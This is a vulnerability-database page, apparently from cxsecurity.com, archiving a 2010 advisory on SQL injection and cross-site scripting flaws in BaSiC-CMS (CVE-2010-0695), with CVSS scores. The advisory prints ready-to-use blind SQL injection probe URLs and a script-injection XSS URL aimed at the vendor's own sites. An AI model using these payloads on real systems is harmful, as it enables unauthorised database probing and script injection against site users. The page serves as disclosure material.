Index
Bugtraq
Pełna lista
Błędy
Sztuczki
Exploity
Dorks list
Tylko z CVE
Tylko z CWE
Bogus
Ranking
CVEMAP
Świeża lista CVE
Producenci
Produkty
Słownik CWE
Sprawdź nr. CVE
Sprawdź nr. CWE
Szukaj
W Bugtraq
W bazie CVE
Po autorze
Po nr. CVE
Po nr. CWE
Po producencie
Po produkcie
RSS
Bugtraq
CVEMAP
CVE Produkty
Tylko Błędy
Tylko Exploity
Tylko Dorks
Więcej
cIFrex
Facebook
Twitter
Donate
O bazie
Lang
Polish
English
Submit
BaSiC-CMS cross site scripting and blind remote SQL injection
2010.02.14
Credit:
Red-D3v1L
Risk:
Medium
Local:
No
Remote:
Yes
CVE:
CVE-2010-0695
CWE:
CWE-79
Ogólna skala CVSS:
4.3/10
Znaczenie:
2.9/10
Łatwość wykorzystania:
8.6/10
Wymagany dostęp:
Zdalny
Złożoność ataku:
Średnia
Autoryzacja:
Nie wymagana
Wpływ na poufność:
Brak
Wpływ na integralność:
Częściowy
Wpływ na dostępność:
Brak
[?] ~ Note : sEc-r1z CrEw# r0x ! ============================================================================== [?] BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities ============================================================================== [?] My home: [ http://sec-r1z.com ] [?] For Ask: [ r-d@passport.com] [?] Script: [ BaSiC-CMS ] [?] Home Scirpt [ http://www.basic-cms.de/ ] [?] Language: [ PHP ] [?] Founder: [ Red-D3v1L ] [?] Gr44tz to: [ sec-r1z# Crew - My L0vE A ] [?] n00bz : [Zombie_KSA g0t 0wn3d hehehe n00b pakbugs zf0 ..] ######################################################################## ===[ Exploit SQL Blind ]=== [»] Exploit : index.php?r=&page_id=[Blind] http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=1 << this true http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=0 << this faulse http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=4 << this true http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%28@@version,1,1%29=5 << this faulse ===[ Exploit XSS ]=== index.php?&nav_id=[XSS Code] http://www.basic-cms.de/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E ./Greetz For All my Frindes ============================================================================== #sEc-r1z.com Str1kEz y0u !
Referencje:
http://www.securityfocus.com/bid/38235
http://packetstormsecurity.org/1002-exploits/basiccms-sqlxss.txt
See this note in RAW Version
Tweet
Vote for this issue:
0
0
50%
50%
Thanks for you vote!
Thanks for you comment!
Your message is in quarantine 48 hours.
Comment it here.
Nick (*)
Email (*)
Video
Text (*)
(*) -
required fields.
Cancel
Submit
{{ x.nick }}
|
Date:
{{ x.ux * 1000 | date:'yyyy-MM-dd' }}
{{ x.ux * 1000 | date:'HH:mm' }}
CET+1
{{ x.comment }}
Show all comments
Copyright
2024
, cxsecurity.com
Back to Top